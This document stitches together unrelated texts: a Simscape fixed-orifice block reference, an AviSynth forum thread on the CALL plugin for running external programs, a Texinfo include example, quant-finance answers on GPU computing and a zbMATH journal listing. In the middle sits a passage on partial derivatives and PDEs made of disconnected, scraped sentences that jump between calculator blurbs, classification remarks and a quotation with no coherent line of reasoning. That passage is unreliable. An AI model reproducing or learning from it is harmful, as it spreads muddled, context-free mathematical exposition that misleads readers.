`$\Delta p={p}_{\text{A}}-{p}_{\text{B}},$`
where
• q: Flow rate
• Δp: Pressure differential
• pA, pB: Gauge pressures at the block terminals
• CD: Flow discharge coefficient
• A: Orifice passage area
• ρ: Fluid density
• pcr: Minimum pressure for turbulent flow
The minimum pressure for turbulent flow, pcr, is calculated according to the laminar transition specification method:
• By pressure ratio — The transition from laminar to turbulent regime is defined by the following equations:
pcr = (pavg + patm)(1 – Blam)
pavg = (pA + pB)/2
where
• pavg: Average pressure between the block terminals
• patm: Atmospheric pressure, 101325 Pa
• Blam: Pressure ratio at the transition between laminar and turbulent regimes (the Laminar flow pressure ratio parameter value)
• By Reynolds number — The transition from laminar to turbulent regime is defined by the following equations:
`${p}_{cr}=\frac{\rho }{2}{\left(\frac{{\mathrm{Re}}_{cr}\cdot \nu }{{C}_{D}\cdot {D}_{H}}\right)}^{2}$`
`${D}_{H}=\sqrt{\frac{4A}{\pi }}$`
where
• DH: Orifice hydraulic diameter
• ν: Fluid kinematic viscosity
• Recr: Critical Reynolds number (the Critical Reynolds number parameter value)
The block positive direction is from port A to port B. This means that the flow rate is positive if it flows from A to B, and the pressure differential is determined as $\Delta p={p}_{\text{A}}-{p}_{\text{B}}$.
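As a cross-check of the equations above, here is a small sketch in Python (not MATLAB/Simscape code; the fluid density of 850 kg/m³ and the port pressures are illustrative assumptions):

```python
import math

def fixed_orifice_flow(p_a, p_b, area=1e-4, c_d=0.7,
                       rho=850.0, b_lam=0.999, p_atm=101325.0):
    """Flow rate through a sharp-edged fixed orifice, using the
    pressure-ratio method for the laminar/turbulent transition."""
    dp = p_a - p_b                           # pressure differential, Pa
    p_avg = (p_a + p_b) / 2.0                # average terminal pressure
    p_cr = (p_avg + p_atm) * (1.0 - b_lam)   # laminar/turbulent threshold
    return (c_d * area * math.sqrt(2.0 / rho)
            * dp / (dp**2 + p_cr**2) ** 0.25)

q = fixed_orifice_flow(2e5, 1e5)   # ~1.07e-3 m^3/s for these inputs
```

Note that reversing the port pressures gives an equal and opposite flow rate, matching the block's sign convention.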
## Variables
Use the Variables tab to set the priority and initial target values for the block variables prior to simulation. For more information, see Set Priority and Initial Target for Block Variables.
## Basic Assumptions and Limitations
• Fluid inertia is not taken into account.
## Parameters
Orifice area
Orifice passage area. The default value is `1e-4` m^2.
Flow discharge coefficient
Semi-empirical parameter for orifice capacity characterization. Its value depends on the geometrical properties of the orifice, and usually is provided in textbooks or manufacturer data sheets. The default value is `0.7`.
Laminar transition specification
Select how the block transitions between the laminar and turbulent regimes:
• `Pressure ratio` — The transition from laminar to turbulent regime is smooth and depends on the value of the Laminar flow pressure ratio parameter. This method provides better simulation robustness.
• `Reynolds number` — The transition from laminar to turbulent regime is assumed to take place when the Reynolds number reaches the value specified by the Critical Reynolds number parameter.
Laminar flow pressure ratio
Pressure ratio at which the flow transitions between laminar and turbulent regimes. The default value is `0.999`. This parameter is visible only if the Laminar transition specification parameter is set to ```Pressure ratio```.
Critical Reynolds number
The maximum Reynolds number for laminar flow. The value of the parameter depends on the orifice geometrical profile. You can find recommendations on the parameter value in hydraulics textbooks. The default value is `12`, which corresponds to a round orifice in thin material with sharp edges. This parameter is visible only if the Laminar transition specification parameter is set to `Reynolds number`.
## Global Parameters
Parameters determined by the type of working fluid:
• Fluid density
• Fluid kinematic viscosity
Use the Hydraulic Fluid block or the Custom Hydraulic Fluid block to specify the fluid properties.
## Ports
The block has the following ports:
`A`
Hydraulic conserving port associated with the orifice inlet.
`B`
Hydraulic conserving port associated with the orifice outlet.
## Extended Capabilities
### C/C++ Code Generation
Generate C and C++ code using Simulink® Coder™.
Introduced in R2006a
|
|
The Chain Rule. Unless otherwise stated, all functions are functions of real numbers that return real values, although more generally the formulae below apply wherever they are well defined, including the case of complex numbers. Differentiation is linear. Such a function can be studied by holding all variables except one constant and observing its variation with respect to one single selected variable. The elliptic/parabolic/hyperbolic classification provides a guide to appropriate initial and boundary conditions and to the smoothness of the solutions. The gradient is a vector comprising the partial derivatives of a function with respect to the variables. The same principle can be observed in PDEs where the solutions may be real or complex and additive. This is a reflection of the fact that they are not, in any immediate way, both special cases of a "general solution formula" of the Laplace equation. $$u(x,0)=f(x)$$. If the data on S and the differential equation determine the normal derivative of u on S, then S is non-characteristic. The solution approach is based either on eliminating the differential equation completely (steady state problems), or rendering the PDE into an approximating system of ordinary differential equations, which are then numerically integrated using standard techniques such as Euler's method, Runge–Kutta, etc. Numerical partial differentiation: 2-D and 3-D problems, transient conditions, rate of change of the value of the function with respect to a selected variable. Solution of standard types of first order partial differential equations.
Partial Derivative Calculator: a step-by-step partial derivatives calculator for functions in two variables. 1) u = f(x, y, z, p, q, ...) of several variables. Ordinary differential equations form a subclass of partial differential equations, corresponding to functions of a single variable. Note that a function of three variables does not have a graph. The classification depends upon the signature of the eigenvalues of the coefficient matrix a_{i,j}. Elementary rules of differentiation. Step 3: multiply through by the bottom so we no longer have fractions. Poisson formula for a ball. There are no generally applicable methods to solve nonlinear PDEs. Separable PDEs correspond to diagonal matrices: thinking of "the value for fixed x" as a coordinate, each coordinate can be understood separately. And the negative sign in Equation [2] simply negates each of the components. Since we are treating y as a constant, sin(y) also counts as a constant. For the partial derivative with respect to h we hold r constant: f'_h = πr²(1) = πr² (π and r² are constants, and the derivative of h with respect to h is 1). It says "as only the height changes (by the tiniest amount), the volume changes by πr²". It is like we add the thinnest disk on top, with a circle's area of πr². So (x, y), a point in the two-dimensional plane, belongs to D, where D is an open set in R², our Cartesian plane. Partly due to this variety of sources, there is a wide spectrum of different types of partial differential equations, and methods have been developed for dealing with many of the individual equations which arise.
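To make the "step by step" idea concrete, here is a minimal central-difference sketch of a partial derivative in Python (illustrative only; `partial_derivative` and the example function are assumptions, not code from any of the calculators mentioned):

```python
def partial_derivative(f, var, point, h=1e-6):
    """Central-difference estimate of the partial derivative of f
    with respect to argument number `var`, evaluated at `point`."""
    plus, minus = list(point), list(point)
    plus[var] += h
    minus[var] -= h
    return (f(*plus) - f(*minus)) / (2 * h)

f = lambda x, y: x**2 * y + y**3   # example function of two variables

dfdx = partial_derivative(f, 0, (2.0, 3.0))  # analytic value: 2xy = 12
dfdy = partial_derivative(f, 1, (2.0, 3.0))  # analytic value: x^2 + 3y^2 = 31
```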
This is a linear partial differential equation of first order for µ: Mµ_y − Nµ_x = µ(N_x − M_y). In the general situation that u is a function of n variables, u_i denotes the first partial derivative relative to the i'th input, u_{ij} denotes the second partial derivative relative to the i'th and j'th inputs, and so on. The aforementioned calculator computes a derivative of a certain function with respect to a variable x using analytical differentiation. Sometimes a function of several variables cannot neatly be written with one of the variables isolated. Even more phenomena are possible. When applying partial differentiation it is very important to keep in mind which symbol is the variable and which ones are the constants. Computational solutions to nonlinear PDEs, such as the split-step method, exist for specific equations like the nonlinear Schrödinger equation. This corresponds to diagonalizing an operator. A formula sheet of derivatives includes numerous formulas covering derivatives of constants, trigonometric functions, hyperbolic, exponential and logarithmic functions, polynomials, inverse trigonometric functions, etc. From Entropy and Partial Differential Equations by Lawrence C. Evans, Department of Mathematics, UC Berkeley: "A good many times I have been present at gatherings of people who, by the standards of traditional culture, are thought highly educated and who have with considerable gusto been expressing their incredulity at the illiteracy of scientists." This context precludes many phenomena of both physical and mathematical interest. As such, it is usually acknowledged that there is no "general theory" of partial differential equations, with specialist knowledge being somewhat divided between several essentially distinct subfields.[1] Elliptic, parabolic, and hyperbolic partial differential equations of order two have been widely studied since the beginning of the twentieth century.
If n = 1, the graph of f(x) = x is the line y = x. Mathematicians usually write the variable as x or y and the constants as a, b or c, but in physical chemistry the symbols are different. (viii) Differentiation of integrable functions: if g₁(x) and g₂(x) are defined in [a, b], differentiable at x ∈ [a, b], and f(t) is continuous for g₁(a) ≤ f(t) ≤ g₂(b), then ... For virtually all functions ƒ(x, y) commonly encountered in practice, the mixed partials are equal (ƒ_xy = ƒ_yx); that is, the order in which the derivatives are taken is immaterial. (This is separate from asymptotic homogenization, which studies the effects of high-frequency oscillations in the coefficients upon solutions to PDEs.) In contrast to the earlier examples, this PDE is nonlinear, owing to the square roots and the squares. Ultrahyperbolic: there is more than one positive eigenvalue and more than one negative eigenvalue, and there are no zero eigenvalues. One says that a function u(x, y, z) of three variables is "harmonic", or "a solution of the Laplace equation", if it satisfies that condition. Such functions were widely studied in the nineteenth century due to their relevance for classical mechanics. This is analogous in signal processing to understanding a filter by its impulse response. The coefficients A, B, C... may depend upon x and y. If f is zero everywhere then the linear PDE is homogeneous, otherwise it is inhomogeneous. For the Laplace equation, as for a large number of partial differential equations, such solution formulas fail to exist. This looks very similar to the formal definition of the derivative, but I just always think about it as spelling out what we mean by partial y and partial f, and spelling out why it is that Leibniz came up with this notation in the first place.
For example, ∂w/∂x means differentiate with respect to x holding both y and z constant, and so, for this example, ∂w/∂x = sin(y + 3z). We can also represent dy/dx as D_x y. This technique rests on a characteristic of solutions to differential equations: if one can find any solution that solves the equation and satisfies the boundary conditions, then it is the solution (this also applies to ODEs). The section also places the scope of studies in APM346 within the vast universe of mathematics. The aim of this is to introduce and motivate partial differential equations (PDEs). A partial differential equation (PDE) is an equation involving partial derivatives. Existence and regularity for −∆u + u = f on Tⁿ. Topics: partial differential equations; linear differential equations; non-linear differential equations; homogeneous differential equations; non-homogeneous differential equations; different differentiation formulas for calculus. If a hypersurface S is given in the implicit form ... Differentiation under the integral sign. There is only a limited theory for ultrahyperbolic equations (Courant and Hilbert, 1962). The superposition principle applies to any linear system, including linear systems of PDEs. First, differentiating ƒ with respect to x ... For example, for a function u of x and y, a second order linear PDE is of the form, where the a_i and f are functions of the independent variables only. This is possible for simple PDEs, which are called separable partial differential equations, and the domain is generally a rectangle (a product of intervals).
|
|
Welcome to Doom9's Forum, THE in-place to be for everyone interested in DVD conversion. Before you start posting please read the forum rules. By posting to this forum you agree to abide by the rules.
Doom9's Forum CALL command
Register FAQ Calendar Search Today's Posts Mark Forums Read
28th March 2003, 14:43 #41 | Link DDogg Retired, but still around Join Date: Oct 2001 Location: Lone Star Posts: 3,058 Sh0dan, Nic, anybody that might know, a theory question: Main question - In theory would it be possible for the call command to do multiple tasks while it is in an active state? Not to distract from the main question and just as a poor example: Say we had a separate file called dothis.call with several actions and execute it with: call(blankclip,"execute d:\dothis.call","-2") Contents of external file named "dothis.call" (or marked in a script something like a function?) dothis.call # whatever multiple avisynth keywords/actions NicEcho.exe output some variables Import something using avisynth import command internal variable=imported variable end Last edited by DDogg; 28th March 2003 at 15:27.
28th March 2003, 15:47 #42 | Link Bidoche Avisynth 3.0 Developer Join Date: Jan 2002 Location: France Posts: 639 won't Import("mycalls.avs") do the job ?
28th March 2003, 15:54 #43 | Link DDogg Retired, but still around Join Date: Oct 2001 Location: Lone Star Posts: 3,058 er, I am not too swift at this, but I did not think the call command would do an internal command? The import command would have to be done within the call command to cause import to activate at the prescribed place in the video event. I will see if I can figure it out and try. If you have an example in mind it would be appreciated. /edit After quite a few experiments I do not think it is possible to execute a avisynth internal command like Import from within the CALL command. If I find out different I'll update. Still looking for "Main question - In theory would it be possible for the call command to do multiple tasks while it is in an active state?", Bidoche? Last edited by DDogg; 29th March 2003 at 01:46.
29th March 2003, 11:44 #44 | Link bilu Registered User Join Date: Oct 2002 Location: Portugal Posts: 1,182 Hi Ddogg, I'm still trying to figure out what you want, but please confirm for me if it is this: (from an old example ) INFO.BAT ========= del c:\info.avs for /F "usebackq" %%i IN (time /t) DO @echo Time=%%i > c:\info.avs for /F "usebackq" %%i IN (date /t) DO @echo Date=%%i >> c:\info.avs In AVS script ============== CALL(BlankClip,"c:\info.bat","49") Import("c:\info.avs",50) --> would import at frame 50 ? I don't know if the script would stop rendering until the CALL command finishes ... it could be the only way to know if it would be safe to import a generated script at a specific time. Also the Import command seems to load the script to generate the filter graph at start, but it should be possible (Bidoche? ) to modify Import (or use it within a function that could be applied to a certain frame range, don't know if that's possible) to load an imported script at a specific frame. Best regards, Bilu
29th March 2003, 12:28 #45 | Link Nic Moderator Join Date: Oct 2001 Location: England Posts: 3,285 The parameter passed to Call.dll is just a string, and that string is taken as the main parameter to call CreateProcess with. By giving it an avs file, all that would happen is the avs file would be run and probably Windows Media Player would pop up Ill think about the best way of outputing the full elapsed time, the script idea could get complex Ill also start to play with the Invoke command in avisynth soon. Cheers, -Nic
9th July 2004, 21:01 #47 | Link enterprise Registered User Join Date: Jul 2004 Posts: 6 Call command Hi, nic. I checked your Call Plugin and I think it's amazing! It's exactly what I was looking for. However I have to reload the avi every time, because once the Call command is launched it's not launched anymore until I reload the avi. I think it's because of the cache but I don't know how I can fix it. I think that if I compiled AviSynth again with a different cache value it would work, but I don't know how it could be compiled, and I would also want the Call plugin to work on a standard AviSynth. Could you help me?
9th July 2004, 21:24 #48 | Link stickboy AviSynth Enthusiast Join Date: Jul 2002 Location: California, U.S. Posts: 1,267 Exactly what do you want to do? Call is invoked when the script is loaded, not on a per-frame-basis or anything like that. Edit: Okay, I don't know what I'm talking about it. I obviously haven't used Call in awhile and had forgotten it does per-frame-stuff. Last edited by stickboy; 10th July 2004 at 09:03.
10th July 2004, 08:11 #49 | Link enterprise Registered User Join Date: Jul 2004 Posts: 6 Thank you for your reply! I want to execute an external command at specific frame even if I play several times the AVI. Call("c:\Command.exe", "100") If I open AVI with Mediaplayer, call command is executed only 1 time at frame 100. but if I play again the AVI, the command is not executed. I am looking for a way to solve it.
22nd December 2011, 08:34 #50 | Link vampiredom Registered User Join Date: Aug 2008 Posts: 233 Reviving this ancient thread... Is this any way to send an apostrophe (') inside an argument without CALL_25.dll converting it to a double quote (")? I've tried \' and everything I could think of but no luck.
25th December 2011, 22:04 #51 | Link
Chikuzen
typo lover
Join Date: May 2009
Posts: 595
Quote:
Originally Posted by vampiredom Reviving this ancient thread... Is this any way to send an apostrophe (') inside an argument without CALL_25.dll converting it to a double quote (")? I've tried \' and everything I could think of but no luck.
on DOS-prompt, escape sequence is not \ but ^
__________________
my repositories
26th December 2011, 03:03 #52 | Link
vampiredom
Registered User
Join Date: Aug 2008
Posts: 233
Quote:
on DOS-prompt, escape sequence is not \ but ^
Nope. Doesn't work either. I believe CALL_25.dll was made to internally translate single-quotes to double-quotes; to make it easier for people to send long strings as arguments without having to triple-quote things in AviSynth. This works great – except, of course, when you want to include single-quotes in the string!
26th December 2011, 13:55 #53 | Link
Gavino
Avisynth language lover
Join Date: Dec 2007
Location: Spain
Posts: 3,420
Quote:
Originally Posted by vampiredom I believe CALL_25.dll was made to internally translate single-quotes to double-quotes; to make it easier for people to send long strings as arguments without having to triple-quote things in AviSynth.
Looking through the thread (original was before my time), it seems people were unaware you could use triple-quotes, or perhaps that facility didn't exist back then. Anyway, I've had a look at the CALL source code and it always translates single-quotes to double-quotes - unfortunately, there is no escape mechanism, so the implementation is badly conceived.
__________________
GScript and GRunT - complex Avisynth scripting made easier
26th December 2011, 19:53 #54 | Link
vampiredom
Registered User
Join Date: Aug 2008
Posts: 233
Quote:
it always translates single-quotes to double-quotes - unfortunately, there is no escape mechanism, so the implementation is badly conceived
Yeah, unfortunate. I think I will write a "partner" .exe for CALL_25.dll that allows some kind of escape mechanism. Perhaps I could use ^x, followed by a hex character code. (so that ' would be ^x27). Does that sound like a reasonable workaround for this issue?
30th December 2011, 21:45 #55 | Link vampiredom Registered User Join Date: Aug 2008 Posts: 233 CALL_25_Helper Download OK, I made this little "helper" app to allow single-quotes (and just about any other funky chars, theoretically) to be passed via CALL_25.dll The following chars need to be escaped, like such: Code: ^ -> ^x5E ' -> ^x27 \ -> ^x5C " -> ^x22 These are then unescaped by my .exe There is also its buddy-function for AviSynth, CALL_25_Helper(), which does the escaping automatically. Code: # Modify the CALL_25_Helper_Dir variable to contain the path to CALL_25_Helper.exe # This path should end with a trailing slash (or backslash) # example: # global CALL_25_Helper_Dir = "C:/Program Files (x86)/AviSynth 2.5/plugins/" global CALL_25_Helper_Dir = "" # CALL_25_Helper() # Usage examples: # CALL_25_Helper("c:\path\to\foo.exe", "argument1 argument2 argument3") # CALL_25_Helper("c:\path\to\bar.exe", """-a "quoted string #1" -b "quoted string #2"""") Note that you need to define the global CALL_25_Helper_Dir so that CALL_25 can find the helper .exe ... so either modify the line in the .avsi or include the "global" statement in the top of your script: Code: global CALL_25_Helper_Dir = "C:\Program Files (x86)\AviSynth 2.5\plugins\" **EDIT** Note: In reality, only the ' and " chars truly need to be escaped. The reason ^ gets escaped is to avoid any confusion with the escape sequence (though this is improbable). The \ gets escaped only because my .exe will sometimes interpret it as an escape char when passed inside of an argument (such as the case of \", which would be an escaped quote). Safety first. Last edited by vampiredom; 31st December 2011 at 04:29. Reason: clarification of the escape sequences
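The ^xHH escape scheme described in the post above can be sketched in a few lines (Python; this mirrors the table in the post and is not the actual CALL_25_Helper source):

```python
# Escape/unescape for the ^xHH scheme: ^ ' \ " become ^x5E ^x27 ^x5C ^x22.
SPECIAL = "^'\\\""

def escape(s):
    return "".join("^x%02X" % ord(c) if c in SPECIAL else c for c in s)

def unescape(s):
    out, i = [], 0
    while i < len(s):
        if s.startswith("^x", i) and i + 4 <= len(s):
            out.append(chr(int(s[i + 2:i + 4], 16)))  # decode two hex digits
            i += 4
        else:
            out.append(s[i])
            i += 1
    return "".join(out)
```

Any string survives an escape/unescape round trip, which is the property the helper relies on when handing arguments through CALL_25.dll.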
31st December 2011, 04:14 #56 | Link vampiredom Registered User Join Date: Aug 2008 Posts: 233 Another interesting thing about the CALL_25_Helper ... Since the command is ultimately being executed by the CALL_25_Helper.exe (instead of directly by CALL_25.dll) it now possible to execute system commands ... and you can omit the full path when the the executable is in the system path. A simple example: Code: # Open up a Windows Explorer window @ drive d: from AviSynth CALL_25_Helper("explorer", "d:") Nifty. Last edited by vampiredom; 31st December 2011 at 04:23.
15th July 2012, 19:38 #57 | Link martin53 Registered User Join Date: Mar 2007 Posts: 407 Hi nic, vampiredom or anyone interested and capable of doing this, is there anyone who would like to help me with this idea: - Add a clip parameter to call, and make the call plugin first copy the current frame to the clipboard before executing the command - allow call to execute the command with every frame - wait for the command to finish, then copy the clipboard content to the return clip (you got it: the command changed the frame in the clipboard) - maybe add another clip parameter which gives the assumed return clip properties for the graph creation phase of the AviSynth script The use case I have in mind is to call ImageMagick operations inside an AviSynth script. Even if it might be slow, all available ImageMagick operations would be accessible at one stroke. I am specifically interested in the Fourier and other transform features, which are slow anyway. The command would be the ImageMagick script, of course, that would start and end by reading/writing the clipboard. Just to allow the command to change the dimensions or other clip properties, it would be useful to give the extended call plugin the 2nd clip as a prototype for ImageMagick's return data. Last edited by martin53; 15th July 2012 at 19:55.
15th July 2012, 19:55 #58 | Link um3k Registered User Join Date: May 2007 Posts: 220 I wonder if it would be better to use stdin and stdout instead of the clipboard?
15th July 2012, 21:20 #59 | Link StainlessS HeartlessS Usurer Join Date: Dec 2009 Location: Over the rainbow Posts: 10,155 mg262's run_25_dll_20050616 dll WarpEnterprises (Runs a system command. Simple source in text file, very succinct) __________________ I sometimes post sober. StainlessS@MediaFire ::: AND/OR ::: StainlessS@SendSpace "Some infinities are bigger than other infinities", but how many of them are infinitely bigger ???
16th July 2012, 20:14 #60 | Link
martin53
Registered User
Join Date: Mar 2007
Posts: 407
Quote:
Originally Posted by StainlessS mg262's run_25_dll_20050616 dll WarpEnterprises (Runs a system command. Simple source in text file, very succinct)
hmm, indeed, http://avisynth.org/warpenterprises/...l_20050616.zip could be a close to perfect starting point. Today, it just returns the unchanged clip. This would need some work.
|
|
## Sample File with `@include`
Here is an example of a complete outer Texinfo file with `@include` files within it before running `texinfo-multiple-files-update`, which would insert a main or master menu:
```\input texinfo @c -*-texinfo-*-
@setfilename include-example.info
@settitle Include Example
@setchapternewpage odd
@titlepage
@sp 12
@center @titlefont{Include Example}
@sp 2
@center by Whom Ever
@page
@vskip 0pt plus 1filll
@end titlepage
@ifinfo
@node Top, First, (dir), (dir)
@end ifinfo
@include foo.texinfo
@include bar.texinfo
@include concept-index.texinfo
@summarycontents
@contents
@bye
```
An included file, such as `foo.texinfo', might look like this:
```@node First, Second, , Top
@chapter First Chapter
Contents of first chapter ...
```
The full contents of `concept-index.texinfo' might be as simple as this:
```@node Concept Index, , Second, Top
@unnumbered Concept Index
@printindex cp
```
The outer Texinfo source file for The GNU Emacs Lisp Reference Manual is named `elisp.texi'. This outer file contains a master menu with 417 entries and a list of 41 `@include` files.
|
|
# Tag Info
7
The Pagès-Wilbertz paper is a very good one. To answer more directly your underlying question, which is "in which quant finance areas should one use hardware acceleration?", the points to take into account are: GPU is very good for parallel computations (already underlined in remarks) but bad for memory sharing between the master software and the GPU-hosted ...
2
There are few surveys atm as people are still relatively secretive about it because of the various challenges a production system poses. Actually a major bank even stepped back after some initial efforts. So there is now quite some activity in the field, but not as much as the initial hype suggested. You can also try asking in the dedicated LinkedIn group. ...
2
You should write some kernel functions in CUDA (Nvidia language) for your matlab code. Arrayfun is quite restrictive and not appropriate. Look at this link http://fr.mathworks.com/help/distcomp/run-cuda-or-ptx-code-on-gpu.html for more details about matlab and parallel computing.
1
There are some restrictions to using arrayfun. You can read the restrictions here. Judging from the error, you cannot use indexes the way you are. You probably have to create separate GPU arrays for $V_{t+1}$ and $V_t$. I suggest that you find similar examples in Matlab's website and try to replicate its functionality. Here is an article with ...
1
It's been a few years since the OP, and GPU usage is much more common. While still experimental, most institutions we talk to are running GPUs in the data center in some capacity. GPUs are good at large aggregations and chewing through large and streaming datasets which translates to things like: x-Valuation Adjustments (xVA) in relation to derivative ...
|
|
# zbMATH — the first resource for mathematics
## The Journal of Geometric Analysis
Short Title: J. Geom. Anal. Publisher: Springer US, New York, NY; Mathematica Josephina, St. Louis, MO ISSN: 1050-6926; 1559-002X/e Online: http://link.springer.com/journal/volumesAndIssues/12220 Comments: Indexed cover-to-cover
Documents Indexed: 2,166 Publications (since 1991) References Indexed: 2,147 Publications with 52,129 References.
#### Latest Issues
31, No. 10 (2021) 31, No. 9 (2021) 31, No. 8 (2021) 31, No. 7 (2021) 31, No. 6 (2021) 31, No. 5 (2021) 31, No. 4 (2021) 31, No. 3 (2021) 31, No. 2 (2021) 31, No. 1 (2021) 30, No. 4 (2020) 30, No. 3 (2020) 30, No. 2 (2020) 30, No. 1 (2020) 29, No. 4 (2019) 29, No. 3 (2019) 29, No. 2 (2019) 29, No. 1 (2019) 28, No. 4 (2018) 28, No. 3 (2018) 28, No. 2 (2018) 28, No. 1 (2018) 27, No. 4 (2017) 27, No. 3 (2017) 27, No. 2 (2017) 27, No. 1 (2017) 26, No. 4 (2016) 26, No. 3 (2016) 26, No. 2 (2016) 26, No. 1 (2016) 25, No. 4 (2015) 25, No. 3 (2015) 25, No. 2 (2015) 25, No. 1 (2015) 24, No. 4 (2014) 24, No. 3 (2014) 24, No. 2 (2014) 24, No. 1 (2014) 23, No. 4 (2013) 23, No. 3 (2013) 23, No. 2 (2013) 23, No. 1 (2013) 22, No. 4 (2012) 22, No. 3 (2012) 22, No. 2 (2012) 22, No. 1 (2012) 21, No. 4 (2011) 21, No. 3 (2011) 21, No. 2 (2011) 21, No. 1 (2011) 20, No. 4 (2010) 20, No. 3 (2010) 20, No. 2 (2010) 20, No. 1 (2010) 19, No. 4 (2009) 19, No. 3 (2009) 19, No. 2 (2009) 19, No. 1 (2009) 18, No. 4 (2008) 18, No. 3 (2008) 18, No. 2 (2008) 18, No. 1 (2008) 17, No. 4 (2007) 17, No. 3 (2007) 17, No. 2 (2007) 17, No. 1 (2007) 16, No. 4 (2006) 16, No. 3 (2006) 16, No. 2 (2006) 16, No. 1 (2006) 15, No. 4 (2005) 15, No. 3 (2005) 15, No. 2 (2005) 15, No. 1 (2005) 14, No. 4 (2004) 14, No. 3 (2004) 14, No. 2 (2004) 14, No. 1 (2004) 13, No. 4 (2003) 13, No. 3 (2003) 13, No. 2 (2003) 13, No. 1 (2003) 12, No. 4 (2002) 12, No. 3 (2002) 12, No. 2 (2002) 12, No. 1 (2002) 11, No. 4 (2001) 11, No. 3 (2001) 11, No. 2 (2001) 11, No. 1 (2001) 10, No. 4 (2000) 10, No. 3 (2000) 10, No. 2 (2000) 10, No. 1 (2000) 9, No. 4 (1999) 9, No. 3 (1999) 9, No. 2 (1999) 9, No. 1 (1999) 8, No. 5 (1998) 8, No. 4 (1998) ...and 33 more Volumes
#### Authors
14 Isaev, Alexander 11 Yang, Dachun 10 Chang, Der-Chen E. 10 Fornæss, John Erik 10 Kim, Kang-Tae 9 Duong, Xuan Thinh 9 Forstnerič, Franc 8 D’Angelo, John P. 8 Han, Yongsheng 8 Krantz, Steven George 8 Lu, Guozhen 8 Xiao, Jie 7 Bedford, Eric 7 Chang, Shu-Cheng 7 Harrison, Jenny C. 7 Li, Ji 7 Novikov, Roman G. 7 Sabadini, Irene 7 Weiss, Guido L. 6 Auscher, Pascal 6 Bonami, Aline 6 Diederich, Klas 6 Li, Haizhong 6 Markina, Irina 6 McNeal, Jeffery D. 6 Morgan, Frank 6 Seeger, Andreas 6 Xue, Qingying 6 Yuan, Wen 5 Agler, Jim 5 Ambrosio, Luigi 5 Benedetto, John J. 5 Cheltsov, Ivan Anatol’evich 5 Colombo, Fabrizio 5 Dong, Yuxin 5 Ezhov, Vladimir Vladimirovich 5 Ji, Shanyu 5 Lin, Chincheng 5 Lu, Zhiqin 5 Petersen, Peter V 5 Raich, Andrew S. 5 Schmalz, Gerd 5 Shanmugalingam, Nageswari 5 Taylor, Michael Eugene 5 The Anh Bui 5 Tie, Jingzhi 5 Tien Cuong Dinh 5 Torres, Rodolfo H. 5 Young, Nicholas John 5 Zwonek, Włodzimierz 4 Alías, Luis J. 4 Angella, Daniele 4 Baracco, Luca 4 Barbosa, Ezequiel R. 4 Bisi, Cinzia 4 Brakke, Kenneth A. 4 Carlson, James A. 4 Chakrabarti, Debraj 4 Chen, Xiuxiong 4 Chiu, Hung-Lin 4 Dajczer, Marcos 4 Damek, Ewa 4 de Lima, Henrique F. 4 de Lira, Jorge Herbert Soares 4 Ding, Yong 4 Fernández-Pérez, Arturo 4 Fino, Anna 4 Fu, Siqi 4 Garofalo, Nicola 4 Gaussier, Hervé 4 Gilkey, Peter B. 4 Grafakos, Loukas 4 He, Weiyong 4 Ho, Pak Tung 4 Kenig, Carlos Eduardo 4 Khenkin, Gennadiĭ Markovich 4 Kolesnikov, Alexander V. 4 Koskela, Pekka 4 Kröncke, Klaus 4 Labate, Demetrio 4 Lárusson, Finnur 4 Le Donne, Enrico 4 LeBrun, Claude R. 4 Li, Yuxiang 4 Liu, Liguang 4 McIntosh, Alan 4 Merker, Joël 4 Miatello, Roberto Jorge 4 Ni, Lei 4 Onninen, Jani 4 Palmer, Vicente 4 Peláez, José Ángel 4 Perdomo, Oscar Mario 4 Perry, Peter A. 4 Peters, Han 4 Piccione, Paolo 4 Poletsky, Evgeny A. 4 Polyakov, Peter L. 4 Qiu, Chunhui 4 Ripoll, Jaime Bruck ...and 2,639 more Authors
#### Fields
796 Differential geometry (53-XX) 608 Several complex variables and analytic spaces (32-XX) 418 Partial differential equations (35-XX) 403 Global analysis, analysis on manifolds (58-XX) 248 Harmonic analysis on Euclidean spaces (42-XX) 190 Functions of a complex variable (30-XX) 157 Functional analysis (46-XX) 132 Calculus of variations and optimal control; optimization (49-XX) 118 Operator theory (47-XX) 91 Dynamical systems and ergodic theory (37-XX) 74 Algebraic geometry (14-XX) 67 Potential theory (31-XX) 67 Convex and discrete geometry (52-XX) 63 Topological groups, Lie groups (22-XX) 62 Measure and integration (28-XX) 61 Abstract harmonic analysis (43-XX) 59 Manifolds and cell complexes (57-XX) 58 Real functions (26-XX) 42 Probability theory and stochastic processes (60-XX) 30 Integral transforms, operational calculus (44-XX) 25 Geometry (51-XX) 23 Quantum theory (81-XX) 18 Number theory (11-XX) 16 Linear and multilinear algebra; matrix theory (15-XX) 15 Group theory and generalizations (20-XX) 14 Relativity and gravitational theory (83-XX) 13 History and biography (01-XX) 12 Approximations and expansions (41-XX) 12 General topology (54-XX) 12 Numerical analysis (65-XX) 11 Ordinary differential equations (34-XX) 10 Nonassociative rings and algebras (17-XX) 10 Special functions (33-XX) 10 Difference and functional equations (39-XX) 10 Fluid mechanics (76-XX) 9 Combinatorics (05-XX) 9 Commutative algebra (13-XX) 8 Mechanics of deformable solids (74-XX) 7 $$K$$-theory (19-XX) 7 Mechanics of particles and systems (70-XX) 6 Systems theory; control (93-XX) 6 Information and communication theory, circuits (94-XX) 5 Integral equations (45-XX) 5 Algebraic topology (55-XX) 5 Statistical mechanics, structure of matter (82-XX) 3 General and overarching topics; collections (00-XX) 3 Associative rings and algebras (16-XX) 3 Classical thermodynamics, heat transfer (80-XX) 3 Operations research, mathematical programming (90-XX) 2 Sequences, series, summability (40-XX) 2 Optics, electromagnetic theory (78-XX) 2 Biology and other natural sciences (92-XX) 1 Mathematical logic and foundations (03-XX) 1 General algebraic systems (08-XX) 1 Field theory and polynomials (12-XX) 1 Game theory, economics, finance, and other social and behavioral sciences (91-XX)
#### Citations contained in zbMATH Open
1,529 Publications have been cited 11,061 times in 8,907 Documents Cited by Year
Hardy spaces of differential forms on Riemannian manifolds. Zbl 1217.42043
Auscher, Pascal; McIntosh, Alan; Russ, Emmanuel
2008
An inviscid flow with compact support in space-time. Zbl 0836.76017
1993
Intrinsic capacities on compact Kähler manifolds. Zbl 1087.32020
Guedj, Vincent; Zeriahi, Ahmed
2005
Gradient Young measures generated by sequences in Sobolev spaces. Zbl 0808.46046
Kinderlehrer, David; Pedregal, Pablo
1994
A wavelet theory for local fields and related groups. Zbl 1114.42015
Benedetto, John J.; Benedetto, Robert L.
2004
Harmonic analysis on solvable extensions of H-type groups. Zbl 0788.43008
Damek, Ewa; Ricci, Fulvio
1992
On the structure of finite perimeter sets in step 2 Carnot groups. Zbl 1064.49033
